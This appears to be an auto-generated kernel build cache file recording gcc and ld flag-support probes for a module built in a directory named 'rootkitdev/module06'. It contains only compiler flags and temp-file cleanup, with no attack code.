__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mskip-rax-setup";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mskip-rax-setup 22 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-mtune_generic";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -mtune=generic 23 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-funit-at-a-time";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -funit-at-a-time 24 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI__-mfentry_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"y";_else_echo_"n";_fi;_rm_-f_"_TMP"_"_TMPO" := y 25 | __cached_/bin/bash_./scripts/gcc-version.sh_-p_gcc := 070400 26 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_".cfi_startproc_n.cfi_rel_offset_rsp_0_n.cfi_endproc"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CFI_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CFI=1 27 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_".cfi_startproc_n.cfi_signal_frame_n.cfi_endproc"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CFI_SIGNAL_FRAME_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CFI_SIGNAL_FRAME=1 28 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_".cfi_sections_.debug_frame"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CFI_SECTIONS_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CFI_SECTIONS=1 29 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"fxsaveq__%rax_"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_FXSAVEQ_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_FXSAVEQ=1 30 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"pshufb_%xmm0_%xmm0"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_SSSE3_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_SSSE3=1 31 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"crc32l_%eax_%eax"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_CRC32_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_CRC32=1 32 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"vxorps_%ymm0_%ymm1_%ymm2"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_AVX_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_AVX=1 33 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"vpbroadcastb_%xmm0_%ymm1"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_AVX2_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_AVX2=1 34 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"vpmovm2b_%k1_%zmm5"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_AVX512_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_AVX512=1 35 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"sha1msg1_%xmm0_%xmm1"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_SHA1_NI_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_SHA1_NI=1 36 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___printf_"%b_n"_"sha256msg1_%xmm0_%xmm1"_|_gcc_-D__ASSEMBLY___-fno-PIE_-m64_-DCONFIG_X86_X32_ABI_-c_-x_assembler_-o_"_TMP"_-__>/dev/null_2>&1;_then_echo_"-DCONFIG_AS_SHA256_NI_1";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -DCONFIG_AS_SHA256_NI=1 37 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___ld_-m_elf_x86_64__-z_max-page-size_0x200000_-v__>/dev/null_2>&1;_then_echo_"_-z_max-page-size_0x200000";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -z max-page-size=0x200000 38 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-jump-tables";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-jump-tables 39 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fno-delete-null-pointer-checks";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -fno-delete-null-pointer-checks 40 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wframe-address_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-frame-address";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-frame-address 41 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wformat-truncation_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-format-truncation";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-format-truncation 42 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wformat-overflow_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-format-overflow";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-format-overflow 43 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wint-in-bool-context_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-int-in-bool-context";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-int-in-bool-context 44 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-Waddress-of-packed-member_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-address-of-packed-member";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 45 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-Wattribute-alias_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-attribute-alias";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 46 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_-Wmaybe-uninitialized_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-maybe-uninitialized";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wno-maybe-uninitialized 47 | __cached_/bin/bash_./scripts/gcc-version.sh_gcc := 0704 48 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"--param_allow-store-data-races_0";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := --param=allow-store-data-races=0 49 | __cached_/bin/bash_./scripts/gcc-goto.sh_gcc_-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context___-O2__--param_allow-store-data-races_0 := y 50 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wframe-larger-than_1024";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wframe-larger-than=1024 51 | 